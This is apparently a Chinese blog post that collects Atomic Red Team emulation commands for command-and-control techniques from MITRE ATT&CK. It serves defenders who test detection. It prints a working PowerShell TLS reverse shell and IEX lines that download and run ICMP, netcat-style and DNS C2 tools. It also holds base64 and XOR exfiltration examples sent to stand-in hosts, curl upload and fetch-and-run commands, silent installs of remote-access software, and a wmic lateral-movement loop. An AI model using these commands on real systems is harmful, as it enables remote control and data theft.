Atomic-命令与控制战术
具体战术概览
| command-and-control |
| T1573 |
| Encrypted Channel 加密通道 |
| |
| T1572 |
| Protocol Tunneling 协议隧道 |
| |
| T1571 |
| Non-Standard Port 非标准端口 |
| |
| T1219 |
| Remote Access Software 远程访问软件 |
| |
| T1132.001 |
| Data Encoding: Standard Encoding 数据编码:标准编码 |
| |
| T1105 |
| Ingress Tool Transfer 入口工具传输 |
| |
| T1095 |
| Non-Application Layer Protocol 非应用层协议 |
| |
| T1090.003 |
| Proxy: Multi-hop Proxy 代理:多跳代理 |
| |
| T1090.001 |
| Proxy: Internal Proxy 代理:内部代理 |
| |
| T1071.004 |
| Application Layer Protocol: DNS 应用层协议:DNS |
| |
| T1071.001 |
| Application Layer Protocol: Web Protocols 应用层协议:Web协议 |
主机模型-加密通道
1. 使用 Openssl 建立 C2
C2 : Command and Control (C2)
| $server_ip = 127.0.0.1 |
| $server_port = 443 |
| $socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '#{server_port}') |
| $stream = $socket.GetStream() |
| $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])) |
| $sslStream.AuthenticateAsClient('fakedomain.example', $null, "Tls12", $false) |
| $writer = new-object System.IO.StreamWriter($sslStream) |
| $writer.Write('PS ' + (pwd).Path + '> ') |
| $writer.flush() |
| [byte[]]$bytes = 0..65535|%{0}; |
| while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0) |
| {$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); |
| $sendback = (iex $data | Out-String ) 2>&1; |
| $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; |
| $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); |
| $sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}sc.exe create artservice binPath= "%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt" |
| |
https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926
https://gist.githubusercontent.com/clr2of8/4786587885a7debc576ab44a32fa5cb7/raw/af5827f3169920035da73bc17bc5ec8465b41c59/c2_client_to_openssl_server.ps1
主机模型-协议隧道
1. 通过DNS over HTTPS 进行大量查询
| for($i=0; $i -le 1000; $i++) { (Invoke-WebRequest \""https: |
2. 通过 DNS over HTTPS 进行常规信标
常规信标:该测试模拟受感染的主机通过 DoH 查询向命令和控制服务器定期发送信标。这种行为对于处于空闲状态等待指令或配置为随着时间的推移使用低查询量来逃避基于阈值的检测的植入物来说是典型的。
| Set-Location C:\AtomicRedTeam\atomics .\T1572\src\T1572-doh-beacon.ps1 -DohServer https: |
3. 通过 DNS over HTTPS 进行长域名查询
| Set-Location C:\AtomicRedTeam\atomics .\T1572\src\T1572-doh-domain-length.ps1 -DohServer https: |
主机模型-非标准端口
1. 使用 Powershell 测试非标准端口使用情况
| Test-NetConnection -ComputerName google.com -port 8081 |
2. 使用 telnet 测试非标准端口使用情况
| echo quit | telnet google.com 8081 |
| exit 0 |
主机模型-远程访问软件
1. 在 Windows 上检测 TeamViewer 软件
| Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\TeamViewer_Setup.exe https: |
| $file1 = "C:\Users\" + $env:username + "\Desktop\TeamViewer_Setup.exe" |
| Start-Process -Wait $file1 /S; |
| Start-Process 'C:\Program Files (x86)\TeamViewer\TeamViewer.exe' |
| |
2. 在 Windows 上检测 Anydesk 软件
| Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\AnyDesk.exe https: |
| $file1 = "C:\Users\" + $env:username + "\Desktop\AnyDesk.exe" |
| Start-Process $file1 /S; |
| |
3. 在 Windows 上检测 LogMeIn 软件
| Invoke-WebRequest -OutFile C:\Users\$env:username\Desktop\LogMeInIgnition.msi https: |
| $file1 = "C:\Users\" + $env:username + "\Desktop\LogMeInIgnition.msi" |
| Start-Process -Wait $file1 /quiet; |
| Start-Process 'C:\Program Files (x86)\LogMeIn Ignition\LMIIgnition.exe' "/S" |
| |
4. 在 Windows 上安装 GoToAssist 软件
| Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1" |
| $file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe" |
| Start-Process $file1 /S; |
| |
5. 在 Windows 上安装 ScreenConnect 软件
| $installer = "C:\Users\$env:username\Downloads\ScreenConnect.msi" |
| Invoke-WebRequest -OutFile $installer "https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.11.4237.7885_Release.msi" |
| msiexec /i $installer /qn |
6. 在 Windows 上安装 Ammyy Admin 软件
| Start-Process $env:temp\ammyy.exe |
7. 在 Windows 上安装 RemotePC 软件
| Start-Process $env:temp\RemotePC.exe |
8. 在 Windows 上安装 NetSupport 远程访问木马(RAT)软件
| Start-Process $env:temp\T1219_NetSupport.exe -ArgumentList "/S /v/qn" |
9. 在 Windows 上安装 UltraViewer 软件
| Start-Process -Wait -FilePath "$env:temp\T1219_UltraViewer.exe" -Argument "/silent" -PassThru |
| Start-Process 'C:\Program Files (x86)\UltraViewer\UltraViewer_Desktop.exe' |
10. 在 Windows 上安装 UltraVNC 软件
| Start-Process $env:ProgramFiles\'uvnc bvba\UltraVnc\vncviewer.exe' |
11. 在 Windows 上安装 MSP360 软件
| Start-Process $env:ProgramFiles\Connect\Connect.exe |
主机模型-数据编码-标准编码
1. 使用 Base64 编码数据
| echo -n 111-11-1111 | base64 |
| curl -XPOST MTExLTExLTExMTE=.redcanary.com |
2. 使用 XOR 编码数据
| $plaintext = ([system.Text.Encoding]::UTF8.getBytes(\""Path\n----\nC:\Users\victim\"")) $key = \""abcdefghijklmnopqrstuvwxyz123456\"" $cyphertext = @(); for ($i = 0; $i -lt $plaintext.Count; $i++) { $cyphertext += $plaintext[$i] -bxor $key[$i %% $key.Length]; } $cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext) [System.Net.ServicePointManager]::Expect100Continue = $false Invoke-WebRequest -Uri example.com -Method POST -Body $cyphertext -DisableKeepAlive |
主机模型-入口工具传输
入口工具传输:可以理解为恶意攻击者想将一些带上传,下载,复制,移动,反弹功能的各种类似工具传入到目标受害的主机上,以达到进入目标主机的入口所使用的工具,我们成为入口工具传输。
具体测试用例看下面链接:
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md
提取常用的入口工具特征
| rsync scp sftp |
| |
| (certutil -urlcache) |
| |
| (certutil -verifyctl) |
| |
| (bitsadmin.exe /transfer) |
| |
| (New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}") |
| |
| cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*" |
| MpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path} |
| |
| timeout --preserve-status 1 whois -h localhost -p 443 "Hello from Atomic Red Team test T1105" > /tmp/T1105.whois.out |
| |
| (New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file} |
| |
| finger base64_filedata@#{remote_host} |
| |
| $imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe" |
| & $imewdbled #{remote_url} |
| |
| 下载 |
| curl -k url -o c:\users\public\music\allthethingsx64.dll |
| curl -k url --output c:\users\public\music\allthethingsx64.dll |
| curl -k url -o c:\programdata\allthethingsx64.dll |
| curl -k url -o %Temp%\allthethingsx64.dll |
| |
| 上传 |
| curl -T c:\temp\atomictestfile.txt www.example.com |
| curl --upload-file c:\temp\atomictestfile.txt www.example.com |
| curl -d c:\temp\atomictestfile.txt www.example.com |
| curl --data c:\temp\atomictestfile.txt www.example.com |
| |
| https: |
| |
| $machine_list = "$env:temp\T1105MachineList.txt" |
| $offline_list = "$env:temp\T1105OfflineHosts.txt" |
| $completed_list = "$env:temp\T1105CompletedHosts.txt" |
| foreach ($machine in get-content -path "$machine_list") |
| {if (test-connection -Count 1 -computername $machine -quiet) |
| {cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" |
| echo $machine >> "$completed_list" |
| wmic /node: "$machine" process call create "regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}"} |
| else |
| {echo $machine >> "$offline_list"}} |
| |
| replace.exe |
| |
| certreq.exe -Post -config https: |
| |
| wscript.exe PathToAtomicsFolder\T1105\src\T1105-download-file.vbs |
| |
| curl -sO https: |
| | bash atomic.sh |
| |
| nimgrab.exe |
| |
| powershell.exe iwr -URI https: |
| |
主机模型-非应用层协议
1. ICMP C2
| IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1') |
| Invoke-PowerShellIcmp -IPAddress 127.0.0.1 |
2. Netcat C2
| cmd /c $env:TEMP\T1095\nmap-7.80\ncat.exe 127.0.0.1 80 |
3. Powercat C2
| IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1') |
| powercat -c 127.0.0.1 -p 80 |
主机模型-代理-多跳代理
1. Psiphon
| PathToAtomicsFolder\T1090.003\src\Psiphon.bat |
| |
| 特征:psiphon3.exe |
| |
| https: |
2. Tor Proxy Usage - Windows
| invoke-expression 'cmd /c start powershell -Command {cmd /c $env:temp\tor\Tor\tor.exe}' |
| sleep -s 60 |
| stop-process -name "tor" | out-null |
| |
| https: |
3. Tor Proxy Usage - Debian/Ubuntu
| sudo systemctl start tor |
| |
| sudo apt-get -y install tor |
4. Tor Proxy Usage - MacOS
| osascript -e 'tell application "Terminal" to do script "tor"' |
| |
| if [ ! -x "$(command -v brew --version)" ]; then /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh keystroke return)"; fi |
| brew install tor |
主机模型-代理-内部代理
1. Connection Proxy
| export http_proxy=127.0.0.1:8080 |
| |
| unset http_proxy |
| unset https_proxy |
2. Connection Proxy for macOS UI
| networksetup -setwebproxy Wi-Fi 127.0.0.1 8080 |
| networksetup -setsecurewebproxy Wi-Fi 127.0.0.1 8080 |
| |
| networksetup -setwebproxystate Wi-Fi off |
| networksetup -setsecurewebproxystate Wi-Fi off |
3. portproxy reg key
| netsh interface portproxy add v4tov4 listenport=1337 connectport=1337 connectaddress=127.0.0.1 |
| |
| netsh interface portproxy delete v4tov4 listenport=1337 -ErrorAction Ignore | Out-Null |
主机模型-应用层协议-DNS
1. 大量的 DNS 查询
| for($i=0; $i -le 1000; $i++) { Resolve-DnsName -type \""TXT\"" \""atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io\"" -QuickTimeout} |
2. DNS 常规信标
| Set-Location C:\AtomicRedTeam\atomics .\T1071.004\src\T1071-dns-beacon.ps1 -Domain 127.0.0.1.xip.io -Subdomain atomicredteam -QueryType TXT -C2Interval 30 -C2Jitter 20 -RunTime 30 |
3. DNS 长域名查询
| Set-Location C:\AtomicRedTeam\atomics .\T1071.004\src\T1071-dns-domain-length.ps1 -Domain 127.0.0.1.xip.io -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType TXT |
4. DNS C2
| IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1') |
| Start-Dnscat2 -Domain example.com -DNSServer 127.0.0.1 |
主机模型-应用层协议-Web 协议
1. 使用 Powershell 执行恶意的User-Agent
| Invoke-WebRequest www.google.com -UserAgent "HttpBrowser/1.0" | out-null |
| Invoke-WebRequest www.google.com -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null |
| Invoke-WebRequest www.google.com -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null |
| Invoke-WebRequest www.google.com -UserAgent "*<|>*" | out-null |
2. 使用 CMD 执行恶意的User-Agent
| curl -s -A "HttpBrowser/1.0" -m3 www.google.com >nul 2>&1 |
| curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com >nul 2>&1 |
| curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com >nul 2>&1 |
| curl -s -A "*<|>*" -m3 www.google.com >nul 2>&1 |
3. Linux 环境下执行恶意的User-Agent
| curl -s -A "HttpBrowser/1.0" -m3 www.google.com |
| curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com |
| curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com |
| curl -s -A "*<|>*" -m3 www.google.com |
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
2021-06-08 HTB-靶机-Obscurity
2020-06-08 sqlmap从入门到精通-第一章-2-4-sqlmap使用攻略及技巧(1)